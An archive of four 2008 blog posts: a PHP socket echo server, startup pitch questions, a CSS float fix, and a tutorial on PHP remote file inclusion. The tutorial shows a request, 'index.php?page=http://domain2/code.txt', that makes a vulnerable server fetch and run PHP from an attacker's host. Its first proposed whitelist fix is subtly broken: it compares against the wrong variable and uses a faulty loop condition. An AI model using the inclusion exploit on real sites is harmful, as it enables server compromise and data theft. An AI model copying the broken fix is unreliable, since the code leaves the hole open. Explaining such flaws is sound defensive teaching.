Friday, February 29, 2008

PHP Socket Basic



<?
// set some variables
$host = "192.168.1.99";
$port = 1234;
// don't timeout!
set_time_limit(0);
// create socket
$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die("Could not create
socket\n");
// bind socket to port
$result = socket_bind($socket, $host, $port) or die("Could not bind to
socket\n");
// start listening for connections
$result = socket_listen($socket, 3) or die("Could not set up socket
listener\n");
// accept incoming connections
// spawn another socket to handle communication
$spawn = socket_accept($socket) or die("Could not accept incoming
connection\n");
// read client input
$input = socket_read($spawn, 1024) or die("Could not read input\n");
// clean up input string
$input = trim($input);
// reverse client input and send back
$output = strrev($input) . "\n";
socket_write($spawn, $output, strlen ($output)) or die("Could not write
output\n");
// close sockets
socket_close($spawn);
socket_close($socket);
?>

Monday, February 11, 2008

Business Presentation Tips

http://www.feld.com/blog/archives/2004/06/the_torturous_w.html

Following are the questions to address.

1) WHAT IS YOUR VISION?
- What is your big vision?
- What problem are you solving and for whom?
- Where do you want to be in the future?

2) WHAT IS YOUR MARKET OPPORTUNITY AND HOW BIG IS IT?
- How big is the market opportunity you are pursuing and how fast is it growing?
- How established (or nascent) is the market?
- Do you have a credible claim on being one of the top two or three players in the market?

3) DESCRIBE YOUR PRODUCT/SERVICE
- What is your product/service?
- How does it solve your customer’s problem?
- What is unique about your product/service?

4) WHO IS YOUR CUSTOMER?
- Who are your existing customers?
- Who is your target customer?
- What defines an "ideal" customer prospect?
- Who actually writes you the check?
- Use specific customer examples where possible.

5) WHAT IS YOUR VALUE PROPOSITION?
- What is your value proposition to the customer?
- What kind of ROI can your customer expect by using buying your product/service?
- What pain are you eliminating?
- Are you selling vitamins, aspirin or antibiotics? (I.e. a luxury, a nice-to-have, or a need-to-have)

6) HOW ARE YOU SELLING?
- What does the sales process look like and how long is the sales cycle?
- How will you reach the target customer? What does it cost to "acquire" a customer?
- What is your sales, marketing and distribution strategy?
- What is the current sales pipeline?

7) HOW DO YOU ACQUIRE CUSTOMERS?
- What is your cost to acquire a customer?
- How will this acquisition cost change over time and why?
- What is the lifetime value of a customer?

8) WHO IS YOUR MANAGEMENT TEAM?
- Who is the management team?
- What is their experience?
- What pieces are missing and what is the plan for filling them?

9) WHAT IS YOUR REVENUE MODEL?
- How do you make money?
- What is your revenue model?
- What is required to become profitable?

10) WHAT STAGE OF DEVELOPMENT ARE YOU AT?
- What is your stage of development? Technology/product? Team? Financial metrics/revenue?
- What has been the progress to date (make reality and future clear)?
- What are your future milestones?

11) WHAT ARE YOUR PLANS FOR FUND RAISING?
- What funds have already been raised?
- How much money are you raising and at what valuation?
- How will the money be spent?
- How long will it last and where will the company "be" on its milestones progress at that time?
- How much additional funding do you anticipate raising & when?

12) WHO IS YOUR COMPETITION?
- Who is your existing & likely competition?
- Who is adjacent to you (in the market) that could enter your market (and compete) or could be a co-opted partner?
- What are their strengths/weaknesses?
- Why are you different?

13) WHAT PARTNERSHIPS DO YOU HAVE?
- Who are your key distribution and technology partners (current & future)?
- How dependent are you on these partners?

14) HOW DO YOU FIT WITH THE PROSPECTIVE INVESTOR?
- How does this fit w/ the investor’s portfolio and expertise?
- What synergies, competition exist with the investor’s existing portfolio?

15) OTHER
- What assumptions are key to the success of the business?
- What "gotchas" could change the business overnight? New technologies, new market entrants, change in standards or regulations?
- What are your company’s weak links?

Monday, February 4, 2008

Make a container's border work!

div.container {
border: 1px solid #000000;
overflow: hidden;
width: 100%;
}

div.left {
width: 45%;
float: left;
}

div.right {
width: 45%;
float: right;
}

Friday, February 1, 2008

Code Injection Vulnerabilities Explained

Introduction:

There has been a sudden increase of attacks on sites that have Code Injection vulnerabilites. Code Injection is a term used when code is injected straight into a program/script from an outside source for execution at some point in time. These type of vulnerabilities may be many times worse than any other vulnerability, since the security of the website, and possibly of the server, is compromised.


Example:

This example will help you understand what exactly a Code Injection Vulnerability looks like in it's simplest form, and unfortunately, this snipet is actually used in quite a few websites.


... html header ...

<?php
include ('$page');
?>

... html footer ...

Note: There is no php code in the header or footer, it is just HTML.

To some, this is obviously a big mistake. The '$page' variable is never checked, so an attacker can choose what to include. So how does one exploit the above code?



Example Exploit:

An attacker can create a 'txt' file on another server and have it included in the above example. If the attacker puts php code in this 'txt' file, it will be executed on the exploited host.


<?php
phpinfo();
?>


Let's say the vulnerable code is located at 'http://domain/index.php', and the 'txt' file is located at 'http://domain2/code.txt', then the attacker would enter something like this into his browser:


http://domain/index.php?page=http://domain2/code.txt

Then end result would have the exploited website execute the command 'phpinfo()' in between the header and footer where the php include is located.





Explaination:

If you had no problem understanding why this would happen, feel free to skip this section.


The 'include()' function takes data from another file, that is defined in the brackets (), and places the data in the area that the include is executed. So let us run through the program in our minds, and assume the url mentioned above is entered into a browser. In the url, it defines the variable $page as containing 'http://domain2/code.txt', so let us replaces all $page variables with this string:


... html header ...

<?php
include ('http://domain2/code.txt');
?>

... html footer ...

Now the include function takes the code from the url/file mentioned, and places it where the include was called, so the result would be:



... html header ...

<?php
phpinfo();
?>


... html footer ...

Now this is what the server ends up processing. What happens here is the header is displayed, then the php command; 'phpinfo()' is executed, followed by the footer at the end.



What can happen:

The above example had harmless code being executed, but the attacker can execute more malicious code.




  • An attacker can output the contents of any php file raw to the browser, where he can possibly obtain an sql login/password to your database.


  • An attacker can use your website to send out large amounts of spam to various email addresses.
  • An attacker can deface your website.
  • An attacker can obtain private information.
  • An attacker may gain access to the whole server.


This is why it is important to secure your website, and not leave such vulnerabilities open for attack.



Solution:

There is a very simple solution to the above example, and that is to check the variable. In the above example, 99% of the time you know what values $page should be, and therefore can check to see if that is the case.



... html header ...

<?php
//list of valid pages
$pages=array("games/index.html", "news/news.html", "games/1.html");

//check $page variable
$valid=false;
for ($i=0; $i<sizeof($pages) || !$valid; $i++) {
if ($page==$page[$i]) {
$valid=true;
}
}
if ($valid) include($page);
if (!$valid) include($pages[0]); // include the first page if not valid
?>

... html footer ...


Another Solution:

Another solution is to check for invalid characters and setup all the page files in a seperate directory, all together.


Example of where the pages are placed:



  • pages/games.html

  • pages/news.html
  • pages/games-1.html



Code:
... html header ...

<?php
$invalidChars=array("/",".","\\","\"",";");
$page=str_replace($invalidChars,"",$page);
include ("pages/".$page.".html");
?>

... html footer ...